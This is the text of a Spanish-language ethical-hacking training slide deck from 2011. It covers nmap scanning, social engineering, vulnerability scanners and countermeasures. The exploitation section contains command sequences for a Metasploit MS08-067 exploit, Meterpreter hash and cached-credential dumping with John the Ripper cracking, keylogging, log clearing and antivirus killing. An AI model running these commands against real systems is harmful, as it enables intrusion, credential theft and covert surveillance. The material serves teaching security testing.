AGENDA
2 Omar Palomino – [email protected]
1 • Acerca del autor
2 • Introducción al Ethical Hacking
3 • Ethical Hacking vs Pentesting
4 • Escaneo de red organizacional
5 • Análisis de Vulnerabilidades
6 • Explotación de Vulnerabilidades
7 • Pentesting
8 • Prevención y contramedidas
24/09/2011
3 Omar Palomino – [email protected]
• “10 años” de experiencia en seguridad de información
• Psicólogo que aun no comienza sus estudios….
• Maestrista de Ing. de Computación y Sistemas
• Consultor en Seguridad de información, CEH
• Escritor en mis tiempos libres:
http://www.el-palomo.com
24/09/2011
1 • Acerca del autor
• Ethical Hacking = Hacker “bueno”
– Prevención de ataques mal intencionados.
– Análisis de vulnerabilidades preventivos
– Cumplimientos de normas: NTP, ISO 27001
– Uso de metodologías:
• OSSMT, OWASP, etc
– Cumplimiento de la legislación peruana
4 Omar Palomino – [email protected]
2 •Introducción al Ethical Hacking
24/09/2011
7 Omar Palomino – [email protected]
• Uso de herramientas:
– Nmap: La herramienta por excelencia.
– Tracert: Examina las rutas de llegada
– Consulta a los DNS (http://network-tools.com)
– Consúltale a Google
Tools:
* Maltego (veamos un ejemplo)
4 •Escaneo de red organizacional
24/09/2011
8 Omar Palomino – [email protected]
• NMAP:
Root# nmap –sV –O –T3 –PN –F <target>
4 •Escaneo de red organizacional
24/09/2011
9 Omar Palomino – [email protected]
• NMAP Avanzado: TCP Syn Scan
4 •Escaneo de red organizacional
24/09/2011
SYN
SYN / ACK
ACK
Nmap reconoce que hay una conexión abierta: Bingo
10 Omar Palomino – [email protected]
• NMAP Avanzado: TCP Syn Scan
4 •Escaneo de red organizacional
24/09/2011
SYN
SYN / ACK
ACK
Nmap NO reconoce que hay una conexión abierta
11 Omar Palomino – [email protected]
• NMAP Avanzado: TCP Syn Scan
4 •Escaneo de red organizacional
24/09/2011
SYN
SYN / ACK
RST
Nmap reconoce que hay una conexión abierta: BINGO!
Root# nmap –sS –v <target>
12 Omar Palomino – [email protected]
• NMAP Avanzado: Técnicas evasivas de IPS/IDS
4 •Escaneo de red organizacional
24/09/2011
- F: Fragmentar paquetes
- sF: FIN Scan (Stealth Scan)
Omar Palomino – [email protected] 13
4 •Escaneo de red organizacional: Ing. Social
Llamadas telefónicas
Piggybacking
Escritorios limpios
Dumpster diving
Phishing
Redes Sociales
MALTEGO
24/09/2011
Omar Palomino – [email protected] 15
5 • Análisis de Vulnerabilidades
Nessus
Qualys
Acunetix
Shadow Security Scanner
Bactrack
• Vulnerabilidades en S.O y
Aplicaciones
24/09/2011
Omar Palomino – [email protected] 17
Metasploit
24/09/2011
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.117.129
RHOST => 192.168.117.129
msf exploit(ms08_067_netapi) > exploit
6 •Explotación de Vulnerabilidades
Omar Palomino – [email protected] 20
Armitage
24/09/2011
6 •Explotación de Vulnerabilidades
Meterpreter: Familia de plugins avanzados de los mismos creadores de
Metasploit Framework, que se utiliza sobre sistemas comprometidos
y tienen como característica fundamental que todo es cargado en
memoria sin crear ningún proceso adicional ni dejar “rastros”
PS
SYSINFO
IDLETIME
Omar Palomino – [email protected] 21
Armitage
24/09/2011
6 •Explotación de Vulnerabilidades
PS SYSINFO
IDLETIME HASHDUMP
Omar Palomino – [email protected] 22
Rainbow Tables
24/09/2011
6 •Explotación de Vulnerabilidades
Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto
SUPERPASSWORD
SUPERPA SSWORD
e52cac67419a9a22 4a3b108f3fa6cb6d
e52cac67419a9a224a3b108f3fa6cb6d
Omar Palomino – [email protected] 23
Rainbow Tables
24/09/2011
6 •Explotación de Vulnerabilidades
http://ophcrack.sourceforge.net/tables.php
http://www.freerainbowtables.com/en/tables/
http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/
Omar Palomino – [email protected] 24
Rainbow Tables
24/09/2011
6 •Explotación de Vulnerabilidades
Almacenamiento contraseñas del Active Directory
Meterpreter> mkdir C:\cache
Meterpreter> upload /root/cache C:\cache
Meterpreter> cd C:\cache
Meterpreter> ls
C:\cachedump.exe > salida.txt
Meterpreter> download salida.txt
root@bt:/pentest/passwords/john# ./john --wordlist:password.lst -format:mscash salida.txt
Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x])
password (mpalomino)
superpassword (opalomino)
Omar Palomino – [email protected] 25
Armitage
24/09/2011
6 •Explotación de Vulnerabilidades
Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos:
SNIFFING
Interfaces de red TECLADO
Meterpreter> ps
Meterpreter> migrate 1736
Meterpreter> getpid
Meterpreter> keyscan_start
Meterpreter> keyscan_dump
Meterpreter> keyscan_stop
Omar Palomino – [email protected] 26
Armitage
24/09/2011
6 •Explotación de Vulnerabilidades
Screenshot Clearev
Webcam Run get_application_list
Winenum Excute –f cmd.exe –i -t
Run killav Download
Run enum_shares
Run service_maneger -l
Omar Palomino – [email protected] 27
Vistumbler
Android: Wifiscan, Wigle Wifi
Antena: Chipset Realtek o Atheros
Airmon
• Vulnerabilidades en
REDES INALAMBRICAS:
• Encontrar redes
vulnerables:
• Cifrado WEP
• Filtrado MAC
• Wardriving
24/09/2011
6 •Explotación de Vulnerabilidades
Omar Palomino – [email protected] 28
¡Más de 30 redes
vulnerables!
24/09/2011
6 •Explotación de Vulnerabilidades
Omar Palomino – [email protected] 29
¡Más de 20 redes
vulnerables!
24/09/2011
6 •Explotación de Vulnerabilidades
Omar Palomino – [email protected] 30 24/09/2011
6 •Explotación de Vulnerabilidades AndroidScreenCast:
./adb kill-server
./adb star-server
Requerimientos para
auditoría wireless:
• Chipset Realtek, Atheros
• Antena con potencia
• Diversas herramientas:
airmon
Omar Palomino – [email protected] 31
• Vulnerabilidades en la
RED:
• Encontrar información
importante viajando en
la red.
• Contraseñas
• Conversaciones
• Acceso a segmentos
de red no autorizado.
6 •Explotación de Vulnerabilidades
Ettercap
Wireshark
Cain y Abel
SSLTrip
Metasploit
Airmon
24/09/2011
Omar Palomino – [email protected] 32
8 •Prevención y contramedidas
La Seguridad no es solo un proceso Tecnológico… Es
un proceso Organizacional
“El único sistema seguro es aquél que está apagado en el interior de un bloque de
hormigón protegido en una habitación sellada y
rodeada por guardias armados”.
Eric Raymond
24/09/2011
Omar Palomino – [email protected] 33
8 •Prevención y contramedidas
FACTOR TÉCNICO
* Firewall capa 3
* Firewall de aplicaciones
* Firewall de Bases de datos
* IPS/IDS
* Correlación de eventos
……….
FACTOR HUMANO
* Campañas de concientización
* Pruebas de ingeniería social
* Charlas y reuniones
…….
SISTEMA DE GESTIÓN
* Sistema de Gestión de seguridad de información (SGSI)
* ISO 27001 /17799
* Gestión de Riesgos (ISO 27005)
* ITIL, COBIT
……
24/09/2011